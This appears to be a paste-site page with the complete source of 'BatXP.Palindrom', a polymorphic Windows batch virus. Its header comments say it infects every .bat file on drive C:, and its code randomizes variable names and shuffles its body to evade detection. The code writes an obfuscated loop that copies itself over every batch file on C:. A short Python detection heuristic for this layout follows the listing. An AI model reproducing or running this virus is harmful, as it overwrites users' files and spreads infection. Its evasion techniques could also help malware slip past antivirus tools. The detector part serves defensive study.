FlyFar

Virus.WinXP.Bat.Palindrom.b - Source Code

Jul 3rd, 2023
Batch | 7.31 KB | Cybersecurity
  1. @echo off
  2. goto polysta
  3.  
  4. :polysta    %mordnilaP%
  5. ReM Palindrom
  6. ReM ----------- BatXP.Palindom <---> Second Part To Hell[rRlf] -------------------- |Palindrom
  7. ReM                                         |Palindrom
  8. ReM This is BatXP.Palindrom, a polymorph BatXP virus, in it's version 2.0       |Palindrom
  9. ReM It's double polymorph:                              |Palindrom
  10. ReM 1.) It moves the body randomly                          |Palindrom
  11. ReM 2.) It changes the encryption variables                     |Palindrom
  12. ReM I'm sure, that it's the most hightech BatXP virus ever.             |Palindrom
  13. ReM I hope, that you will learn something from the code!                |Palindrom
  14. ReM                                         |Palindrom
  15. ReM *** Information about the virus:                        |Palindrom
  16. ReM VirusName...............BatXP.Palindrom                     |Palindrom
  17. ReM VirusVersion............version 2.0                     |Palindrom
  18. ReM VirusAuthor.............Second Part To Hell[rRlf]               |Palindrom
  19. ReM Infection Way...........It infects every bat-file in every directory        |Palindrom
  20. ReM             at the Drive C:\                    |Palindrom
  21. ReM VirusSize...............7.780 Byte                      |Palindrom
  22. ReM Encrypted...............Yes, but only the Virus-Part                |Palindrom
  23. ReM             It's a "set-encryption".                |Palindrom
  24. ReM Polymorphic.............Yes, two ways:                      |Palindrom
  25. ReM             1.) It moves the body of itself (like BatXP.Saturn) |Palindrom
  26. ReM             2.) It changes the encryption-variable name     |Palindrom
  27. ReM                                         |Palindrom 
  28. ReM Version 2.0 - 30.03.2003:                           |Palindrom
  29. ReM Added the body moving (it was very hard to do)                  |Palindrom
  30. ReM                                         |Palindrom
  31. ReM Version 1.0 - 27.03.2003:                           |Palindrom
  32. ReM Made the virus, encrypt the viruspart and discovered how to change the      |Palindrom
  33. ReM variable names.                                 |Palindrom
  34. ReM                                         |Palindrom
  35. ReM written from 27.03.2003 to 30.03.2003                       |Palindrom
  36. ReM in Austria                                  |Palindrom
  37. ReM ------------------------------------------------------------------------------- |Palindrom
  38. ReM Palindrom
  39. %mordnilaP%set acheck=0
  40. %mordnilaP%set bcheck=0
  41. %mordnilaP%set aaachecker=0
  42. %mordnilaP%set bbbchecker=0
  43. %mordnilaP%set ccchecker=0
  44. %mordnilaP%set dddchecker=0
  45. %mordnilaP%set eeechecker=0
  46. %mordnilaP%set fffchecker=0
  47. %mordnilaP%set gggchecker=0
  48. %mordnilaP%set hhhchecker=0
  49. %mordnilaP%set iiichecker=0
  50. %mordnilaP%set jjjchecker=0
  51. %mordnilaP%set kkkchecker=0
  52. %mordnilaP%set lllchecker=0
  53. %mordnilaP%set mmmchecher=0
  54. %mordnilaP%set nnnchecker=0
  55. %mordnilaP%echo @echo off >checker.bat
  56. %mordnilaP%set crandc=0
  57. :randgen    %mordnilaP%
  58. %mordnilaP%set a=0
  59. %mordnilaP%set counter=0
  60. %mordnilaP%set name=
  61. :stapoly    %mordnilaP%
  62. %mordnilaP%set a=%random%
  63. :polyst     %mordnilaP%
  64. %mordnilaP%if %a% GEQ 50 (set /A a=%a%/3)
  65. %mordnilaP%if %a% LEQ 40 (set /A a=%a%+11)
  66. %mordnilaP%if %a% GEQ 50 (goto polyst)
  67. %mordnilaP%if %a% LSS 41 (goto polyst)
  68. %mordnilaP%set /A a=%a%-40
  69. %mordnilaP%set /A counter=%counter%+1
  70. %mordnilaP%if %a% EQU 1 (set name=%name%P)
  71. %mordnilaP%if %a% EQU 2 (set name=%name%a)
  72. %mordnilaP%if %a% EQU 3 (set name=%name%l)
  73. %mordnilaP%if %a% EQU 4 (set name=%name%i)
  74. %mordnilaP%if %a% EQU 5 (set name=%name%n)
  75. %mordnilaP%if %a% EQU 6 (set name=%name%d)
  76. %mordnilaP%if %a% EQU 7 (set name=%name%r)
  77. %mordnilaP%if %a% EQU 8 (set name=%name%o)
  78. %mordnilaP%if %a% EQU 9 (set name=%name%m)
  79. %mordnilaP%if %counter% LSS 5 goto stapoly
  80. %mordnilaP%set /A crandc=%crandc%+1
  81. %mordnilaP%set name%crandc%=%name%
  82. %mordnilaP%if %crandc% LEQ 13 (goto randgen)
  83. %mordnilaP%goto polystb
  84.  
  85. :polystb        %Palindrom%
  86. %Palindrom%echo @echo off >checker.bat
  87. %Palindrom%echo goto polysta >>checker.bat
  88. :polystbb       %Palindrom%
  89. %Palindrom%set b=%random%
  90. :polystba       %Palindrom%
  91. %Palindrom%set fakewr=P
  92. %Palindrom%if %b% GTR 55 (set /A b=%b%/2)
  93. %Palindrom%if %b% LEQ 40 (set /A b=%b%+15)
  94. %Palindrom%if %b% GTR 55 (goto polystba)
  95. %Palindrom%if %b% LEQ 40 (goto polystba)
  96. %Palindrom%set /A b=%b%-40
  97. %Palindrom%if %b% EQU 1 (if %acheck% NEQ 1 (
  98. %Palindrom%find "mordnila%fakewr%" <%0>>checker.bat
  99. %Palindrom%set acheck=1))
  100. %Palindrom%if %b% EQU 2 (if %aaachecker% NEQ 1 (
  101. %Palindrom%find "%fakewr%aaaa" <%0>>checker.bat
  102. %Palindrom%set aaachecker=1))
  103. %Palindrom%if %b% EQU 3 (if %bbbchecker% NEQ 1 (
  104. %Palindrom%find "%fakewr%bbbb" <%0>>checker.bat
  105. %Palindrom%set bbbchecker=1))
  106. %Palindrom%if %b% EQU 4 (if %ccchecker% NEQ 1 (
  107. %Palindrom%find "%fakewr%cccc" <%0>>checker.bat
  108. %Palindrom%set ccchecker=1))
  109. %Palindrom%if %b% EQU 5 (if %dddchecker% NEQ 1 (
  110. %Palindrom%find "%fakewr%dddd" <%0>>checker.bat
  111. %Palindrom%set dddchecker=1))
  112. %Palindrom%if %b% EQU 6 (if %eeechecker% NEQ 1 (
  113. %Palindrom%find "%fakewr%eeee" <%0>>checker.bat
  114. %Palindrom%set eeechecker=1))
  115. %Palindrom%if %b% EQU 7 (if %fffchecker% NEQ 1 (
  116. %Palindrom%find "%fakewr%ffff" <%0>>checker.bat
  117. %Palindrom%set fffchecker=1))
  118. %Palindrom%if %b% EQU 8 (if %gggchecker% NEQ 1 (
  119. %Palindrom%find "%fakewr%gggg" <%0>>checker.bat
  120. %Palindrom%set gggchecker=1))
  121. %Palindrom%if %b% EQU 9 (if %hhhchecker% NEQ 1 (
  122. %Palindrom%find "%fakewr%hhhh" <%0>>checker.bat
  123. %Palindrom%set hhhchecker=1))
  124. %Palindrom%if %b% EQU 10 (if %iiichecker% NEQ 1 (
  125. %Palindrom%find "%fakewr%iiii" <%0>>checker.bat
  126. %Palindrom%set iiichecker=1))
  127. %Palindrom%if %b% EQU 11 (if %jjjchecker% NEQ 1 (
  128. %Palindrom%find "%fakewr%jjjj" <%0>>checker.bat
  129. %Palindrom%set jjjchecker=1))
  130. %Palindrom%if %b% EQU 12 (if %kkkchecker% NEQ 1 (
  131. %Palindrom%find "%fakewr%kkkk" <%0>>checker.bat
  132. %Palindrom%set kkkchecker=1))
  133. %Palindrom%if %b% EQU 13 (if %lllchecker% NEQ 1 (
  134. %Palindrom%find "%fakewr%llll" <%0>>checker.bat
  135. %Palindrom%set lllchecker=1))
  136. %Palindrom%if %b% EQU 14 (if %bcheck% NEQ 1 (
  137. %Palindrom%find "Palindrom" <%0>>checker.bat
  138. %Palindrom%set bcheck=1))
  139. %Palindrom%if %b% EQU 15 (if %nnnchecker% NEQ 1 (
  140. %Palindrom%find "%fakewr%mmmm" <%0>>checker.bat
  141. %Palindrom%set nnnchecker=1))
  142. %Palindrom%if %acheck% EQU 1 (if %aaachecker% EQU 1 (if %bbbchecker% EQU 1 (if %ccchecker% EQU 1 (
  143. %Palindrom%if %dddchecker% EQU 1 (if %eeechecker% EQU 1 (if %fffchecker% EQU 1 (if %gggchecker% EQU 1 (
  144. %Palindrom%if %hhhchecker% EQU 1 (if %iiichecker% EQU 1 (if %jjjchecker% EQU 1 (if %kkkchecker% EQU 1 (
  145. %Palindrom%if %lllchecker% EQU 1 (if %bcheck% EQU 1 (if %nnnchecker% EQU 1 (
  146. %Palindrom%echo :Pend >>checker.bat
  147. %Palindrom%goto Paaa
  148. %Palindrom%)))))))))))))))
  149. %Palindrom%goto polystbb
  150.  
  151.  
  152.  
  153. :Paaa       %Paaaa%
  154. %Paaaa%echo set %name1%=f>>checker.bat
  155. %Paaaa%goto Pbbb
  156.  
  157. :Pbbb       %Pbbbb%
  158. %Pbbbb%echo set %name2%=o>>checker.bat
  159. %Pbbbb%goto Pccc
  160.  
  161. :Pccc       %Pcccc%
  162. %Pcccc%echo set %name3%=r>>checker.bat
  163. %Pcccc%goto Pddd
  164.  
  165. :Pddd       %Pdddd%
  166. %Pdddd%echo set %name4%=i>>checker.bat
  167. %Pdddd%goto Peee
  168.  
  169. :Peee       %Peeee%
  170. %Peeee%echo set %name5%=n>>checker.bat
  171. %Peeee%goto Pfff
  172.  
  173. :Pfff       %Pffff%
  174. %Pffff%echo set %name6%=b>>checker.bat
  175. %Pffff%goto Pggg
  176.  
  177. :Pggg       %Pgggg%
  178. %Pgggg%echo set %name7%=a>>checker.bat
  179. %Pgggg%goto Phhh
  180.  
  181. :Phhh       %Phhhh%
  182. %Phhhh%echo set %name8%=t>>checker.bat
  183. %Phhhh%goto Piii
  184.  
  185. :Piii       %Piiii%
  186. %Piiii%echo set %name9%=d>>checker.bat
  187. %Piiii%goto Pjjj
  188.  
  189. :Pjjj       %Pjjjj%
  190. %Pjjjj%echo set %name10%=c>>checker.bat
  191. %Pjjjj%goto Pkkk
  192.  
  193. :Pkkk       %Pkkkk%
  194. %Pkkkk%echo set %name11%=p>>checker.bat
  195. %Pkkkk%goto Plll
  196.  
  197. :Plll       %Pllll%
  198. %Pllll%echo set %name12%=y>>checker.bat
  199. %Pllll%goto Pmmm
  200.  
  201. :Pmmm       %Pmmmm%
  202. %Pmmmm%echo %%%name1%%%%%%name2%%%%%%name3%%% /%%%name3%%% C:\ %%%%%%%name3%%% %%%name4%%%%%%name5%%% (*.%%%name6%%%%%%name7%%%%%%name8%%%) %%%name9%%%%%%name2%%% %%%name10%%%%%%name2%%%%%%name11%%%%%%name12%%% %%%name13%%%checker.bat %%%%%%%name3%%% >>checker.bat
  203. %Pmmmm%goto Pend
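The listing above prefixes every line of a block with a never-assigned variable (`%mordnilaP%`, `%Palindrom%`, `%Paaaa%` ...) and then pulls those blocks out of its own file with `find "..." <%0`. The following is an added triage heuristic for that structure, not part of the paste or of the author's code; the function name, the 0.5 threshold and both sample scripts are constructed assumptions.

```python
import re
from collections import Counter

# %name% glued directly onto a command, e.g. "%tag%set x=0".
# "%JAVA_HOME%\bin\java" is not matched because a path separator follows.
LINE_TAG = re.compile(r'^\s*%([A-Za-z_]\w*)%(?=[A-Za-z@])')
# Variables the script assigns itself: set x=, set /A x=, set /P x=
ASSIGN = re.compile(r'(?i)\bset\s+(?:/[ap]\s+)?([A-Za-z_]\w*)=')
# The script filtering its own file: find "..." <%0
SELF_FIND = re.compile(r'(?i)\bfind\s+"[^"]*"\s*<\s*%0')

def analyze(text):
    """Score one batch file for the line-tag / self-extraction layout."""
    lines = [l for l in text.splitlines() if l.strip()]
    assigned = {m.group(1).lower() for l in lines for m in ASSIGN.finditer(l)}
    tags = Counter()
    for l in lines:
        m = LINE_TAG.match(l)
        # A tag only works as a marker if it expands to nothing,
        # i.e. the script never assigns it.
        if m and m.group(1).lower() not in assigned:
            tags[m.group(1)] += 1
    ratio = sum(tags.values()) / len(lines) if lines else 0.0
    self_find = sum(1 for l in lines if SELF_FIND.search(l))
    return {"tags": dict(tags), "tag_ratio": round(ratio, 2),
            "self_find": self_find,
            "suspicious": ratio >= 0.5 and self_find > 0}

# Constructed sample with the same layout as the listing (inert counter loop).
TAGGED = r"""
@echo off
goto start
:start   %qTag%
%qTag%set n=0
%qTag%set /A n=%n%+1
%qTag%echo n is %n%
%qTag%find "qTag" <%0 >>out.tmp
"""

# Constructed ordinary script: environment variables, find on a log file.
BENIGN = r"""
@echo off
set APP=demo
%JAVA_HOME%\bin\java -jar %APP%.jar
%COMSPEC% /c echo done
find "ERROR" <build.log
"""

if __name__ == "__main__":
    print(analyze(TAGGED))
    print(analyze(BENIGN))
```

Because the tag names change between generations, the check keys on the layout (unassigned prefix variables plus a self-referencing `find`) rather than on any fixed string.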
Tags: batch virus SPTH